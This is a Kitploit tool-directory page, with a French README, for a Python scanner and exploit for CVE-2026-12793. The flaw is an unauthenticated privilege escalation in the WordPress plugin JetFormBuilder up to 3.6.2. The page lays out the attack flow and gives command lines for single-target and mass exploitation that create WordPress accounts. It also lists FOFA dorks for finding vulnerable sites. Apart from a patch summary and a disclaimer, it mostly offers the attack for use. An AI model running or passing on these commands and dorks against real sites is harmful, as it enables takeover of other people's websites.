Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-12793 — Scanner PoC ed exploit in Python per CVE-2026-12793, un'escalation di privilegi non autenticata in JetFormBuilder <=3.6.2 che crea account amministratore di WordPress. | Kitploit
Strumenti/GitHubGitHub/murrez/cve-2026-12793
Escalation di PrivilegiRicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitScripting e AutomazioneSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurrez/cve-2026-12793
11 ore faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-12793

Scanner PoC ed exploit in Python per CVE-2026-12793, un'escalation di privilegi non autenticata in JetFormBuilder <=3.6.2 che crea account amministratore di WordPress.

Vedi Repository

CVE-2026-12793 — Escalation de privilèges non authentifiée dans JetFormBuilder

Scanner proof-of-concept et exploit pour CVE-2026-12793 dans le plugin WordPress JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Pluginjetformbuilder
Affecté≤ 3.6.2
Corrigé dans3.6.2.1+
CVSS9.8 Critique
AuthNon authentifié
CWECWE-269 — Gestion inappropriée des privilèges
Chercheurdaroo (Wordfence)

Vulnérabilité

Le plugin ne vérifie pas que _jet_engine_booking_form_id fait référence à un custom post type jet-form-builder publié avant de charger le contenu du bloc de l'article référencé comme schéma de formulaire et d'exécuter les actions post-soumission.

Un attaquant non authentifié peut soumettre une requête AJAX forgée pour déclencher l'action Register User (wp_insert_user) et créer un nouveau compte WordPress. Si le formulaire cible est mal configuré avec un rôle élevé (par exemple administrator), cela conduit à une prise de contrôle complète du site.

Flux d'attaque

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Correctif (3.6.2.1)

  • Block_Helper::is_valid_form_post() — seul le CPT jet-form-builder publié est accepté
  • Form_Handler::set_form_id() rejette les IDs de formulaire invalides
  • Durcissement de la validation SSR (wp_insert_user / wp_update_user bloqués comme callbacks)

Prérequis

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

Utilisation

Cible unique — vérification

root@kitploit:~
python poc.py -u https://target.example --mode check

Scan de masse

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

Formats d'entrée : un domaine/URL par ligne, CSV FOFA (host,domain), ou candidates.jsonl d'une exécution précédente.

Exploit (cible unique)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Exploit de masse depuis les candidats

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Options

Fichiers de sortie

FichierContenu
hits.txt

Exemple d'entrée candidate

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Les noms de champs auto-détectés sont heuristiques. Vérifiez toujours et remplacez-les avec --fields avant l'exploit.

Détection / dorks FOFA

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Vérification de version :

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Recherchez Stable tag: ≤ 3.6.2.

Références

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Avertissement

Cet outil est fourni à des fins de tests de sécurité autorisés et éducatives uniquement. L'accès non autorisé aux systèmes informatiques est illégal. Les auteurs déclinent toute responsabilité en cas de mauvaise utilisation.

Licence

MIT

Scarica lo strumento
FlagDescription
-u, --urlURL de la cible unique
--listFichier de liste des cibles
--modecheck (par défaut) ou exploit
--form-idID de l'article de formulaire JetFormBuilder connu
--page-urlPage intégrant le formulaire (referer), ex. /register/
--fieldsCorrespondance des champs : login=x,email=y,password=z
--pathsChemins supplémentaires à explorer pour les formulaires
--username / --email / --passwordIdentifiants pour l'exploit (aléatoires si omis)
--verifyVérifier le compte via wp-login.php après soumission
-j, --threadsThreads de travail (par défaut : 20)
--timeoutDélai d'attente HTTP en secondes (par défaut : 20)
--proxyURL du proxy HTTP(S)
--outputJournal JSONL complet (par défaut : cve_2026_12793_results.jsonl)
--vuln-listListe des cibles vulnérables (par défaut : hits.txt)
--candidates-listJSONL des candidats (par défaut : candidates.jsonl)
-q, --quietAfficher uniquement la progression
URLs des cibles vulnérables / exploitées
candidates.jsonlCibles avec sonde Register User accessible (form_id, page_url, fields)
cve_2026_12793_results.jsonlRésultats JSON complets par cible